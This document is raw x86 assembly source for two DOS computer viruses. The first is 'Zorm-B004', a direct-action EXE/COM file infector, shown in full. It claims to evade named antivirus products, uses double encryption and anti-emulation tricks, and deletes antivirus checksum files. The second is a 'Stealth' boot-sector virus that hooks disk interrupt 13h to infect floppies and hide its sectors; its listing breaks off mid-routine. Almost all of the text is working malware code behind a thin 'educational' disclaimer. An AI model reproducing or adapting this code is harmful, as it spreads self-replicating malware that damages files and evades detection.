Authorization

;
;    ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ\ ЫЫЫЫЫЫЫЫЫЫЫЫ\ ЫЫЫЫЫЫЫЫЫЫЫЫЫЫ\     ЫЫ\         ЫЫ\
;                  ЬЫЫЫЫ\   ЫЫ\       ЫЫ\ ЫЫ\        ЫЫЫ\     ЫЫЫЫ\     ЫЫЫЫ\
;                ЬЫЫЫЫ\     ЫЫ\       ЫЫ\ ЫЫ\        ЫЫЫ\     ЫЫ\ ЫЫ\ ЫЫ\ ЫЫ\
;              ЬЫЫЫЫ\       ЫЫ\       ЫЫ\ ЫЫЫЫЫЫЫЫЫЫЫЫ\ \     ЫЫ\   ЫЫ\   ЫЫ\                       
;            ЬЫЫЫЫ\         ЫЫ\       ЫЫ\ ЫЫ\         ЫЫ\     ЫЫ\         ЫЫ\
;          ЬЫЫЫЫ\           ЫЫ\       ЫЫ\ ЫЫ\          ЫЫ\    ЫЫ\         ЫЫ\                                       
;        ЬЫЫЫЫ\             ЫЫ\       ЫЫ\ ЫЫ\           ЫЫ\   ЫЫ\         ЫЫ\
;      ЬЫЫЫЫ\               ЫЫ\       ЫЫ\ ЫЫ\            ЫЫ\  ЫЫ\         ЫЫ\
;    ЬЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫ\ ЫЫЫЫЫЫЫЫЫЫЫЫ\ ЫЫ\             ЫЫ\ ЫЫ\         ЫЫ\
;
;(C)By Dr L. from Lamer Corporation  March/July 1998
;
;Description:
;             -      Name:..........Zorm-B004    
;             -      Mode:..........Direct infector no TSR
;             -    Target:..........Exe/Com of Msdos (even com of dos7+)
;             -    Status:..........Not detected by Tbav806,F-prot301,228       
;                                   dr.Web,Avp30,nod-ice,findvirus786 
;                                                   (2nd+ generations)     
;             - Description:
;               This virus infects 2 exe+2 com files when executed.            
;               Can change of directory by using both dot-dot method
;               and the path variable of dos environnment.
;               It doesnt contain nasty routines.
;               Its twice encrypted and use several anti-emulation
;               routines.It doesnt infect command.com and win.com
;               of win95. 
;               It erases most checksums files made by anti-virus 
;               in the directories where it have found targets to
;               infect.
;               Anti-lamer routine included :)
;
;             - Disclaimer:
;               This virus was written for research and educationnal
;               purposes.
;               Its the 4th version of this serie.
;               I have fixed some bugs.
;               But one problem still remains:
;                       This virus can damaged win.com/command.com of
;                       win31 when executed or maybe all can be fine
;                       i cant study this problem cause i dont have
;                       win31!
;                         
;                        
;               Compile :tasm/m2 ,tlink/t
;                   



.model tiny                         ;memory model
.code                               ;size <65536

org 100h                            ;its a com file


;-------------------------Beginning---of----loader----------------------
start1:                              
db 0e9h,1,0                         ;jmp 001 byte forward
db 'V'                              ;infection mark

push ds                             ;save dx for later

push  cs                            ;set ds=cs
pop   ds                            ;
       
mov word ptr [_ds],ds               ;save original ds for
                                    ;later
         
mov byte ptr [com_virus],0          ;for the first time          
                                    ;you have to  do that
                                    ;(read below)
 
mov bp,0                            ;set bp the delta offset
                                    ;to zero.No shift to begin
 

jmp over_there

;---------------------------End-----of------loader----------------------


                                 

;----------------------------Beginning--of--virus-----------------------
start:                               
xor dx,dx                           ;set dx=0 for stability
mov cx,end_2nd-begin_2nd            ;cx=nber of bytes to decrypt
xor ax,ax
int 15h
cmp ah,86h                          ;thanx to yesna to show me this
jz itsok                            ;trick ;)
mov ah,4ch
int 21h
itsok:

 
mov ah,3dh                          ;anti-emulation trick. function 3dh
int 21h                             ;int 21h= open file function.ds:dx
;mov al,02h                                    ;have to point to file name.
                                    ;but ds:dx points tojunk so dos returns
                                    ;al=02h.We use this value to decrypt
 
db 04h                              ;=add al,10h
       value db 10h                 ;

              
db 0bbh                             ;mov bx,patch
patch:                              ;patch=addr of begin_2nd.
       dw 0                         ;patch will be set later.
                                   
;settings for decrypt bytes between begin_2nd and end_second is over.



;--------------------------------------------------------
;crypt/decrypt "routine"
;
;remark: _ret will be changed into "ret"  to transform this part
;in a real asm routine.


crypt:
turn_again:
xor byte ptr cs:[bx],al
inc bx
loop turn_again
_ret:                               ;
     ret                            ;to be replaced

;--------------------------------------------------------


begin_2nd:
          db 2eh,0c6h,06h           ;=mov byte ptr cs:[ret_addr],c3h
ret_addr:                           ;
          dw 0                      ;(ret_addr=address where to put 'ret'. 
          db 0c3h                   ;c3h=opcode for "ret")
         

          db 0bbh                   ;=mov bx,0000h
          patch2:                   ;
              dw 0                  ;(patch2=addr of beginning of begin_main)
      
          db 0b0h                   ;=mov al,2
              _al:                  ;
              db 2                  ;
                                    ;(_al=xor key.Not fixed value during
                                    ;infection scheme.see below)  

 mov cx,end_main-begin_main         ;setting to decrypt bytes between
                                    ;label begin_main and end_main is
                                    ;complete
                                    
 call crypt                         ;decrypt now!
 end_2nd:

       begin_main:
                  mov ax,ss         ;if cs=ss i'm a com
                  mov cx,cs         ;
                  cmp ax,cx         ;if not,i'm exe!
                   jz im_com        ;

im_exe:                 
                  cli               ;
                  mov ax,ss         ;reset ss=cs
                  dec ax            ;at the start ss=cs+1 to avoid
                  mov ss,ax         ;"k" flag of tbav.Maybe its a 
                  sti               ;lame way to do that but dont know
                                    ;how to use an other way.
 
  call compute_delta

  push ds                           ;save ds for later
   
  push cs                           ;set ds=cs
  pop  ds                           ;

  mov byte ptr [com_virus+bp],0     ;i'm not a com (save this info
                                    ;for later)
  jmp next_exe                      ;whats follow for a exe file host?
                                   
im_com:

push ds                             ;save it for later



compute_delta_offset:
call compute_delta
mov byte ptr [com_virus+bp],1       ;yep i'm a com file

next_exe:

pop ax                              ;set ax=original ds
mov word ptr [_ds+bp],ax            ;set _ds=original ds
                                    ;you need it for pass
                                    ;control to host.

over_there:                         ;remember me?
                                    ;for the first execution
                                    ;no need to decrypt
                                   

push es                             ;save es
    
push cs                             ;set es=cs
pop  es                             ;

cmp byte ptr [com_virus+bp],1       ;i'm a com?
 
jnz follow_me                       ;nope
 
lea si,store_bytes+bp               ;yep i'm
mov di,100h                         ;ready to transfer byte from
                                    ;location "store_bytes" to
                                    ;beginning of (com) host.
                                    ;(remember the code of *.com
                                    ;begin to cs:100h in memory)  

jmp transfer

follow_me:
;cld
lea si,store+bp                     ;transfer from label "store"
lea di,old+bp                       ;to label "old"
movsw                               ;(set the correct values, segment:
movsw                               ;offset for the return to host.)

transfer:
movsw                               ;you came from "mov di,100h"? ok
movsw                               ;restore (in memory only) the 4 first 
                                    ;originals bytes of host.
 
                                    ;you came from "follow me"? ok restore
                                    ;originals cs:ip and ss:sp found in
                                    ;host (exe) header
 
pop es                              ;beware im back!
 
lea dx,new_dta+bp                   ;dont modify dta!
call set_dta                        ;change it!

mov byte ptr [flag_com+bp],'E'      ;at first we want to infect Exe
                                   

push es                             ;see you later!

create_new_int24h_handler:
mov ax,3524h                        ;                        
int 21h                             ;save original handler                         
mov word ptr [bp+old_int24h],bx     ;of int 24h for restore                        
mov word ptr [bp+old_int24h+2],es   ;it later.                        

mov ah,25h                          ;set a new handler for
lea dx,bp+int_24h                   ;int 24h.
int 21h                             ;so dos dont pop up
                                    ;a infamous error message if virus
                                    ;try to infect write protected
                                    ;disk.

pop es                              ;its me again babe!

count:
mov byte ptr [count_infect+bp],0    ;reset the counter to 0
                                    ;self explanory

get_dir:

 mov ah,47h                         ;
 lea si,current_dir+bp              ;save the current directory
 xor dl,dl                          ;for later when virus pass
 int 21h                            ;control to host and the return to
                                    ;dos.the size of buffer is  64 bytes.
get_disk:
         mov ah,19H                 ;from a:or b:or...virus is running?      
         int 21h                    ;
         mov byte ptr [disk+bp],al  ;
         cmp al,02H                 ;virus infect c: not other drive.
                                    ;in practice .
         jz search_begin_path       ;but if you are running the virus
         mov dl,02h                 ;from an drive ,not c:,it infects
         mov ah,0eh                 ;drive c:.
         int 21h                    ;
;-------------------------------------------------------------
;this part search the adress of first byte of the name of the
;first directory include in dos path
;remarks:
;         es is destroyed by the routine
;         es:di points to the address
;         we are searching
         
search_begin_path:

mov ax,es:002ch                     ;es:002ch=address of segment where
mov es,ax                           ;to found in memory the dos path. 
xor di,di                           ;
mov si,di

jmp suite                              
yet:
      inc si
      mov di,si                         
suite:
     mov ax,'AP'                    ;
     scasw                          ;
     jnz yet                        ;
     mov ax,'HT'                    ;search the string 'PATH='
     scasw                          ;in memory
     jnz yet                        ;
     mov al,'='                     ;
     scasb                          ;
     jnz yet                        ;


;---------------------------------------------------------------------------





;------------------------------------------------------------------
;main part of virus routine to search for files
;to infect.

pathdir:                            ;
       call search                  ;go to search in current dir
again1:                             ;
       jc parent                    ;no file found go to "parent"
       call infect                  ;one file found infect it!
      
   cmp byte ptr [count_infect+bp],2 ;
   jz end_infect                    ;
   call search_again                ;
   jmp again1                       ;
parent:   
       call up_dir                  ;
       jnc pathdir                  ;
change_to_c:       
       call change_path_dir         ;
       jnz pathdir                  ;
       jmp end_infect               ;
;------------------------------------------------------------------

infect:
         mov ax,3d02h
         lea dx,new_dta+1eh+bp
         int 21h

read_header:
        
            xchg ax,bx
            mov ah,3fh
            mov cx,1ch
            lea dx,exe_header+bp
            int 21h
test1:
            cmp word ptr [exe_header+bp],'ZM';is it really an exe?
            je test3
test2:
            cmp word ptr [exe_header+bp],'MZ';idem
            jne its_a_com
test3:
            cmp word ptr [exe_header+bp+12h],'VI';infected?
            je terminer                          ;yes,bye bye

test3b:
            cmp word ptr [exe_header+bp+2],00c6h
            jne test4
            cmp word ptr [exe_header+bp+4],00b7h
            je terminer
test4:
            cmp word ptr [exe_header+bp+26],0    ;overlay=0?
            jne terminer                         ;not,bye bye
test5:
            cmp word ptr [exe_header+bp+24],40h  ;windows exe? 
            je terminer                          ;yes ,adios :(

            mov byte ptr [com_target+bp],0
            jmp get_attributes
its_a_com:  

test_com:
             cmp byte ptr [exe_header+bp+3],'V'
             jz terminer
test_win:
             cmp word ptr [exe_header+4+bp],0e1fh
             jnz not_win_com
             cmp word ptr [exe_header+6+bp],0e807h
             jz terminer

 not_win_com:
             jmp suit
             end_infect:
             jmp end_infect2
             suit:
             push di
             push es
             push cs
             pop es
             mov byte ptr [com_target+bp],1

             lea si,exe_header+bp
             lea di,store_bytes+bp
             movsw
             movsw
             pop es
             pop di

get_attributes:
                 mov ax,4300h
                 lea dx,new_dta+1eh+bp
                 int 21h
                 mov word ptr [attribute+bp],cx
set_attributes:
                 lea dx,new_dta+1eh+bp
                 call set_attrib
kill_crc_files:


;-----------------------------------------------
;delete crc files

                 lea dx,killfile1+bp
                 call set_attrib
                 call kill_file
 jmp next
 terminer:
 jmp close_file
 next:
                 lea dx,killfile2+bp
                 call set_attrib
                 call kill_file

                 lea dx,killfile3+bp
                 call set_attrib
                 call kill_file
;------------------------------------------------

 
get_time_date:
                 mov ax,5700h
                 int 21h
                 push cx
                 push dx
cmp byte ptr [com_target+bp],1
jz go_end_of_file
store_info_header:
                   mov ax,word ptr [exe_header+bp+0eh]
                   mov word ptr [store_ss+bp],ax
                   mov ax,word ptr [exe_header+bp+10h]  
                   mov word ptr [store_sp+bp],ax
 
                   mov ax,word ptr [exe_header+bp+14h]
                   mov word ptr [store_ip+bp],ax

                   mov ax,word ptr [exe_header+bp+16h]
                   mov word ptr [store_cs+bp],ax        
go_end_of_file:
 call go_end
 cmp byte ptr [com_target+bp],1
 jnz next_exe_infect
sub ax,7
xchg ax,dx
mov cx,0
mov ax,4200h
int 21h


mov ah,03fh
mov cx,07h
lea dx,queue+(end_virus-start)+bp
int 21h


add word ptr [queue+(end_virus-start)+5+bp],end_virus-start+7
call go_end
mov cx,ax
sub ax,3
mov word ptr [jmp_bytes+bp+1],ax

 add cx,100h
 jmp  change_patch

 next_exe_infect:    

       push ax dx

compute_new_csip:
                  push ax
                  mov ax,word ptr [exe_header+bp+8]
                  mov cl,4
                  shl ax,cl
                  mov cx,ax
                  pop ax
                  sub ax,cx
                  sbb dx,0
                  mov cl,0ch
                  shl dx,cl
                  mov cl,4
                  push ax
                  shr ax,cl
                  add dx,ax
                  shl ax,cl
                  pop cx
                  sub cx,ax
change_header:
                  mov word ptr [exe_header+bp+14h],cx
                  mov word ptr [exe_header+bp+16h],dx
                  inc dx
                  mov word ptr [exe_header+bp+0eh],dx
                  mov word ptr [exe_header+bp+10h],0FF0h
                  mov word ptr [exe_header+bp+0ah],00FFh
                  mov word ptr [exe_header+bp+12h],'VI'
change_patch:
                  push cx
                  add cx,begin_main-start
                  mov word ptr [patch2+bp],cx
                  pop cx
                  push cx
                  add cx,_ret-start
                  mov word ptr [ret_addr+bp],cx
                  pop cx
                
                  add cx,begin_2nd-start
                  mov word ptr [patch+bp],cx
                  cmp byte ptr [com_target+bp],1
                  jz write_virus  
                  pop dx ax
compute_size:
                  add ax,end_virus-start
                  adc dx,0
                  mov cx,512
                  div cx
                  cmp dx,0
                  je enough
                  inc ax
      enough:
                  mov word ptr [exe_header+bp+04],ax
                  mov word ptr [exe_header+bp+02],dx
 write_virus:
                  encipher:
                  call encrypt
                  ;--------------------------------
                  ;routine to avoid tbav "U" flag
                  ;"U"=undocumented dos interrupt
                  ;in fact tbav sets this flag
                  ;if it finds "cdh,xyh" string
                  ;where xy isnt a ordinary value
                  ;for an interrupt.
   
                  lea si,queue+bp+(begin_2nd-start)
                  mov cx,end_virus-begin_2nd
      test_int:  
                 
                 cmp byte ptr [si],0cdh
                 je encipher
                 inc si
                 loop test_int
                  ;-------------------------------

                  ;-------------------------------
                  ;90h=nop replace 'ret' by 'nop'
                  ;for the first execution of crypt
                  ;routine by the target exe
                  ;in the buffer before write it.  
                  mov byte ptr [bp+queue+(_ret-start)],90h
                  ;-------------------------------
                
                  ;-------------------------------
                  ;write the virus to the target file
                  mov ah,40h
                  mov cx,(end_virus-start)+7
                  lea dx,bp+queue
                  int 21h
                  ;-------------------------------
                 
                  ;-------------------------------
                  ;set the file pointer of target to
                  ;the beginning.
go_beginning:
                  mov ax,4200h
                  xor cx,cx
                  cwd
                  int 21h
                  ;-------------------------------

copy_new_header:
                  cmp byte ptr [com_target+bp],1
                  jnz copy_exe
                  lea dx,jmp_bytes+bp
                  mov cx,4
jmp go_copy
copy_exe:       
                  mov cx,1ah
                  lea dx,exe_header+bp
go_copy:
                  mov ah,40h
                  int 21h
inc_counter:
                  inc byte ptr [count_infect+bp]
restore_file_attribute:
                       mov cx,attribute+bp
                       lea dx,1eh+bp+new_dta
                       mov ax,4301h
                       int 21h
restore_date_time:
                       mov ax,5701h
                       pop dx
                       pop cx
                       int 21h  
  close_file:
                  mov ah,3eh
                  int 21h
                  ret

 end_infect2:


restore_disk:          
                  mov dl,byte ptr [disk+bp]
                  mov ah,0Eh
                  int 21h                 
                 
restore_directory:                  
                  mov ah,3bh
                  mov byte ptr [slash+bp],'\'
                  lea dx,[current_dir-1]+bp
                  int 21h
cmp byte ptr [flag_com+bp],'C'
jz exit

mov byte ptr [flag_com+bp],'C'    ;set this flag to avoid
jmp count

exit:

restore_initial_ds_value:

                  mov ax,word ptr [_ds+bp]
                  push ax
                  pop ds

restore_initial_dta:
                  mov dx,80h
                  call set_dta
restore_initial_24h_interrupt:

                 push ds
                 mov ax,2524h
                 lds dx,bp+old_int24h
                 int 21h
                 pop ds

restore_initial_es:                 
                  push ds
                  pop es

cmp byte ptr [com_virus+bp],1
jnz finish_exe

return_com_host:

                 mov ax,100h
                 push ax
                 ret
finish_exe:
                  mov ax,es
                  add ax,10h

set_cs_of_host_to_run_it:                 
                  add word ptr cs:[old_cs+bp],ax
set_stack_of_host:
                  cli
                  add ax,word ptr cs:[bp+old_ss]
                  mov ss,ax                    
                  mov sp,word ptr cs:[bp+old_sp]
                  sti
go_to_host_code:
                  db 0eah     ; :=jmp xxxx:yyyy
old:
                  old_ip dw 0 ;            yyyy
                  old_cs dw 0 ;       xxxx
                  old_sp dw 0
                  old_ss dw 0
store:
                  store_ip dw 0
                  store_cs dw 0fff0h
                  store_sp dw 0
                  store_ss dw 0fff0h

;-----------------------------------
;search in current directory.

search:
                  mov ah,4eh
                  cmp byte ptr [flag_com+bp],'C'
                  jnz its_exe
                  lea dx,com_file+bp
                  jmp its_com
        its_exe:
                  lea dx,file_mask+bp
        its_com:
                  mov cx,7
                  int 21h
                  ret
search_again:
                  mov ah,4fh
                  int 21h
                  ret
;-----------------------------------





;-----------------------------------
;change directory to parent dir.

up_dir:
                  mov ah,3bh
                  lea dx,dot_dot+bp
                  int 21h
                  ret
;-----------------------------------





;-----------------------------------
;find the next dir in dos path
;and set current dir=dir found.

change_path_dir: 

                  lea si,new_dir+bp
        notyet:  
                  cmp byte ptr es:[di],';'
                  jz _end
                  cmp byte ptr es:[di],0
                  jz _end2
                  mov ah,byte ptr es:[di]
                  mov byte ptr [si],ah
                  inc di
                  inc si
                  jmp notyet
                  _end:
                       mov byte ptr [si],0
                       inc di
                  mov ah,3bh
                  lea dx,new_dir+bp
                  int 21h
                  ret
                  _end2:
                   xor ax,ax
                         ret
;------------------------------------------


 encrypt:
                  push ax
                  push bx
 
change_xor_value:
                  mov al,byte ptr [_al+bp]
                  inc al
                  cmp al,0
                  jne more
                  inc al
             more:
                  mov byte ptr [_al+bp],al
                 
                  mov ah,byte ptr [value+bp]
                 
                  inc ah
                  cmp ah,0     
                  jne again
                  inc ah
             again:
                  mov byte ptr [value+bp],ah


 copy_virus_to_queue_buffer:
                  ;cld                
                  push di
                  push es
                  push cs
                  pop es
                  lea si,start+bp
                  lea di,queue+bp
                  mov cx,end_virus-start
                  rep movsb
                  pop es
                  pop di
crypt_main_part_of_virus_in_buffer:
                 
                  mov cx,end_main-begin_main
                  lea bx,queue+(begin_main-start)+bp
                  call crypt
                  xchg al,ah

                  inc al
                  inc al
crypt_2nd_part_of_virus_in_buffer:

                                   mov cx,end_2nd-begin_2nd
                                   lea bx,queue+(begin_2nd-start)+bp
                                   call crypt
 
                                   pop bx
                                   pop ax
                                   ret
set_attrib:
                  mov ax,4301h
                  xor cx,cx
                  int 21h
                  ret
kill_file:
                  mov ah,41h
                  int 21h
                  ret
int_24h:
                  mov al,3
                  iret
set_dta:
                  mov ah,1ah
                  int 21h
                  ret
compute_delta:
                  call delta
        delta:
                  pop bp
                  sub bp,offset delta
                  ret
       go_end:
                  mov ax,4202h
                  xor cx,cx
                  cwd
                  int 21h
                  ret
                 
                  signature db  '(c)Zorm-b004 by Dr.L  March/July98'     
                  jmp_bytes db  0e9h,0,0,'V'
                store_bytes db  90h,90h,0cdh,20h               
                  killfile1 db 'anti-vir.dat',0
                  killfile2 db 'chklist.ms'  ,0
                  killfile3 db 'chklist.cps' ,0
                    dot_dot db '..',0
                  file_mask db 'goat*.exe',0    ;anti-lamer routine
                   com_file db 'goat*.com',0 
                 
end_main:
 

end_virus:
                     com_target db            ?
                     com_virus  db            ?
                      flag_com  db            ?
                          disk  db            ? 
                     attribute  dw            ?
                    old_int24h  dd            ?             
                           _ds  dw            ?
                  count_infect  db            ?
                         slash  db            ?
                   current_dir  db  64  dup  (?)
                    exe_header  db  1ch dup  (?)
                       new_dta  db  43  dup  (?)
                       new_dir  db  64  dup  (?)
    queue:
end start1

;The Stealth Virus is a boot sector virus which remains resident in memory
;after boot so it can infect disks. It hides itself on the disk and includes
;special anti-detection interrupt traps so that it is very difficult to
;locate. This is a very infective and crafty virus.

COMSEG  SEGMENT PARA
        ASSUME  CS:COMSEG,DS:COMSEG,ES:COMSEG,SS:COMSEG

        ORG     100H

START:
        jmp     BOOT_START

;*******************************************************************************
;* BIOS DATA AREA                                                              *
;*******************************************************************************

        ORG     413H

MEMSIZE DW      640                     ;size of memory installed, in KB

;*******************************************************************************
;* VIRUS CODE STARTS HERE                                                      *
;*******************************************************************************

        ORG     7000H

STEALTH:                                ;A label for the beginning of the virus


;*******************************************************************************
;Format data consists of Track #, Head #, Sector # and Sector size code (2=512b)
;for every sector on the track. This is put at the very start of the virus so
;that when sectors are formatted, we will not run into a DMA boundary, which
;would cause the format to fail. This is a false error, but one that happens
;with some BIOS's, so we avoid it by putting this data first.
FMT_12M:        ;Format data for Track 80, Head 1 on a 1.2 Meg diskette,
        DB      80,1,1,2, 80,1,2,2, 80,1,3,2, 80,1,4,2, 80,1,5,2, 80,1,6,2

FMT_360:        ;Format data for Track  40, Head 1 on a 360K diskette
        DB      40,1,1,2, 40,1,2,2, 40,1,3,2, 40,1,4,2, 40,1,5,2, 40,1,6,2


;*******************************************************************************
;* INTERRUPT 13H HANDLER                                                       *
;*******************************************************************************

OLD_13H DD      ?                       ;Old interrupt 13H vector goes here

INT_13H:
        sti
        cmp     ah,2                    ;we want to intercept reads
        jz      READ_FUNCTION
        cmp     ah,3                    ;and writes to all disks
        jz      WRITE_FUNCTION
I13R:   jmp     DWORD PTR cs:[OLD_13H]


;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 2,
;(Read). It checks for several key situations where it must jump into action.
;they are:
;       1) If an attempt is made to read the boot sector, it must be processed
;          through READ_BOOT, so an infected boot sector is never seen. Instead,
;          the original boot sector is read.
;       2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
;          drive C are read, they are processed by READ_HARD, so the virus
;          code is never seen on the hard drive.
;       3) If an attempt is made to read Track 1, Head 0, Sector 1 on the
;          floppy, this routine checks to see if the floppy has already been
;          infected, and if not, it goes ahead and infects it.

READ_FUNCTION:                                  ;Disk Read Function Handler
        cmp     dh,0                            ;is it head 0?
        jnz     I13R                            ;nope, let BIOS handle it
        cmp     ch,1                            ;is it track 1?
        jz      RF0                             ;yes, go do special processing
        cmp     ch,0                            ;is it track 0?
        jnz     I13R                            ;no, let BIOS handle it
        cmp     cl,1                            ;track 0, is it sector 1
        jz      READ_BOOT                       ;yes, go handle boot sector read
        cmp     dl,80H                          ;no, is it hard drive c:?
        jz      RF1                             ;yes, go check further
        jmp     I13R                            ;else let BIOS handle it

RF0:    cmp     dl,80H                          ;is it hard disk?
        jnc     I13R                            ;yes, let BIOS handle read
        cmp     cl,1                            ;no, floppy, is it sector 1?
        jnz     I13R                            ;no, let BIOS handle it
        call    CHECK_DISK                      ;is floppy already infected?
        jz      I13R                            ;yes so let BIOS handle it
        call    INFECT_FLOPPY                   ;no, go infect the diskette
        jmp     SHORT I13R                      ;and then let BIOS do the read

RF1:    cmp     cl,8                            ;sector <  8?
        jnc     I13R                            ;nope, let BIOS handle it
        jmp     READ_HARD                       ;yes, divert read on the C drive


;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 3,
;(Write). It checks for two key situations where it must jump into action. They
;are:
;       1) If an attempt is made to write the boot sector, it must be processed
;          through WRITE_BOOT, so an infected boot sector is never overwritten.
;          instead, the write is redirected to where the original boot sector is
;          hidden.
;       2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
;          drive C are written, they are processed by WRITE_HARD, so the virus
;          code is never overwritten.

WRITE_FUNCTION:                                 ;BIOS Disk Write Function
        cmp     dh,0                            ;is it head 0?
        jnz     I13R                            ;nope, let BIOS handle it
        cmp     ch,0                            ;is it track 0?
        jnz     I13R                            ;nope, let BIOS handle it
        cmp     cl,1                            ;is it sector 1
        jnz     WF1                             ;nope, check for hard drive
        jmp     WRITE_BOOT                      ;yes, go handle boot sector read
WF1:    cmp     dl,80H                          ;is it the hard drive c: ?
        jnz     I13R                            ;no, another hard drive
        cmp     cl,8                            ;sector <  8?
        jnc     I13R                            ;nope, let BIOS handle it
        jmp     WRITE_HARD                      ;else take care of writing to C:


;*******************************************************************************
;This section of code handles reading the boot sector. There are three
;possibilities: 1) The disk is not infected, in which case the read should be
;passed directly to BIOS, 2) The disk is infected and only one sector is
;requested, in which case this routine figures out where the original boot
;sector is and reads it, and 3) The disk is infected and more than one sector
;is requested, in which case this routine breaks the read up into two calls to
;the ROM BIOS, one to fetch the original boot sector, and another to fetch the
;additional sectors being read. One of the complexities in this last case is
;that the routine must return the registers set up as if only one read had
;been performed.
;  To determine if the disk is infected, the routine reads the real boot sector
;into SCRATCHBUF and calls IS_VBS. If that returns affirmative (z set), then
;this routine goes to get the original boot sector, etc., otherwise it calls ROM
;BIOS and allows a second read to take place to get the boot sector into the
;requested buffer at es:bx.

READ_BOOT:
        push    ax                              ;save registers
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    bp

        push    cs                              ;set ds=es=cs
        pop     es
        push    cs
        pop     ds
        mov     bp,sp                           ;and bp=sp

RB001:  mov     al,dl
        call    GET_BOOT_SEC                    ;read the real boot sector
        jnc     RB01                            ;ok, go on
        call    GET_BOOT_SEC                    ;do it again to make sure
        jnc     RB01                            ;ok, go on
        jmp     RB_GOON                         ;error, let BIOS return err code
RB01:   call    IS_VBS                          ;is it the viral boot sector?
        jz      RB02                            ;yes, jump
        jmp     RB_GOON                         ;no, let ROM BIOS read sector
RB02:;  mov     bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)   
    mov    bx,OFFSET SB_DR_FLAG        ;required instead of ^ for a86

        mov     al,BYTE PTR [bx]                ;get disk type of disk being
        cmp     al,80H                          ;read, and make an index of it
        jnz     RB1
        mov     al,4
RB1:    mov     bl,3                            ;to look up location of boot sec
        mul     bl
        add     ax,OFFSET BOOT_SECTOR_LOCATION  ;ax=@BOOT_SECTOR_LOCATION table
        mov     bx,ax
        mov     ch,[bx]                         ;get track of orig boot sector
        mov     dh,[bx+1]                       ;get head of orig boot sector
        mov     cl,[bx+2]                       ;get sector of orig boot sector
        mov     dl,ss:[bp+6]                    ;get drive from original spec
        mov     bx,ss:[bp+10]                   ;get read buffer offset
        mov     ax,ss:[bp+2]                    ;and segment
        mov     es,ax                           ;from original specification
        mov     ax,201H                         ;prepare to read 1 sector
        pushf
        call    DWORD PTR [OLD_13H]             ;do BIOS int 13H
        mov     al,ss:[bp+12]                   ;see if original request
        cmp     al,1                            ;was for more than one sector
        jz      RB_EXIT                         ;no, go exit

READ_1NEXT:                                     ;more than 1 sec requested, so
        pop     bp                              ;read the rest as a second call
        pop     es                              ;to BIOS
        pop     ds
        pop     dx                              ;first restore these registers
        pop     cx
        pop     bx
        pop     ax

        add     bx,512                          ;prepare to call BIOS for
        push    ax                              ;balance of read
        dec     al                              ;get registers straight for it
        inc     cl

        cmp     dl,80H                          ;is it the hard drive?
        jnz     RB15                            ;nope, go handle floppy

        push    bx                              ;handle an infected hard drive
        push    cx                              ;by faking read on extra sectors
        push    dx                              ;and returning a block of 0's
        push    si
        push    di
        push    ds
        push    bp

        push    es
        pop     ds                              ;ds=es

        mov     BYTE PTR [bx],0                 ;set first byte in buffer = 0
        mov     si,bx
        mov     di,bx
        inc     di
        mov     ah,0                            ;ax=number of sectors to read
        mov     bx,512                          ;bytes per sector
        mul     bx                              ;# of bytes to read in dx:ax< 64K
        mov     cx,ax
        dec     cx                              ;number of bytes to move in cx
        rep     movsb                           ;fill buffer with 0's

        clc                                     ;clear c, fake read successful
        pushf                                   ;then restore everyting properly
        pop     ax                              ;first set flag register
        mov     ss:[bp+20],ax                   ;as stored on the stack
        pop     bp                              ;and pop all registers
        pop     ds
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        mov     ah,0
        dec     cl
        sub     bx,512
        iret                                    ;and get out

RB15:                                           ;read next sectors on floppy
        pushf                                   ;call BIOS to
        call    DWORD PTR cs:[OLD_13H]          ;read the rest (must use cs)
        push    ax
        push    bp
        mov     bp,sp
        pushf                                   ;use c flag from BIOS call
        pop     ax                              ;to set c flag on the stack
        mov     ss:[bp+10],ax
        jc      RB2                             ;if error, return ah from 2nd rd
        sub     bx,512                          ;else restore registers so
        dec     cl                              ;it looks as if only one read
        pop     bp                              ;was performed
        pop     ax
        pop     ax                              ;and exit with ah=0 to indicate
        mov     ah,0                            ;successful read
        iret

RB2:    pop     bp                              ;error on 2nd read
        pop     ax                              ;so clean up stack
        add     sp,2                            ;and get out
        iret

RB_EXIT:                                        ;exit from single sector read
        mov     ax,ss:[bp+18]                   ;set the c flag on the stack
        push    ax                              ;to indicate successful read
        popf
        clc
        pushf
        pop     ax
        mov     ss:[bp+18],ax
        pop     bp                              ;restore all registers
        pop     es
        pop     ds
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        mov     ah,0
        iret                                    ;and get out

RB_GOON:                                        ;This passes control to BIOS
        pop     bp                              ;for uninfected disks
        pop     es                              ;just restore all registers to
        pop     ds                              ;their original values
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        jmp     I13R                            ;and go jump to BIOS


;*******************************************************************************
;This table identifies where the original boot sector is located for each
;of the various disk types. It is used by READ_BOOT and WRITE_BOOT to redirect
;boot sector reads and writes.

BOOT_SECTOR_LOCATION:
        DB      40,1,6                          ;Track, head, sector, 360K drive
        DB      80,1,6                          ;1.2M drive
        DB      79,1,9                          ;720K drive
        DB      79,1,18                         ;1.44M drive
        DB      0,0,7                           ;Hard drive


;*******************************************************************************
;This routine handles writing the boot sector for all disks. It checks to see
;if the disk has been infected, and if not, allows BIOS to handle the write.
;If the disk is infected, this routine redirects the write to put the boot
;sector being written in the reserved area for the original boot sector. It
;must also handle the writing of multiple sectors properly, just as READ_BOOT
;did.

WRITE_BOOT:
        push    ax                              ;save everything we might change
        push    bx
        push    cx
        push    dx
        push    ds
        push    es
        push    bp
        mov     bp,sp

        push    cs                              ;ds=es=cs
        pop     ds
        push    cs
        pop     es

        mov     al,dl
        call    GET_BOOT_SEC                    ;read the real boot sector
        jnc     WB01
        call    GET_BOOT_SEC                    ;do it again if first failed
        jnc     WB01
        jmp     WB_GOON                         ;error on read, let BIOS take it
WB01:   call    IS_VBS                          ;else, is disk infected?
        jz      WB02                            ;yes
        jmp     WB_GOON                         ;no, let ROM BIOS write sector
WB02:;  mov     bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)
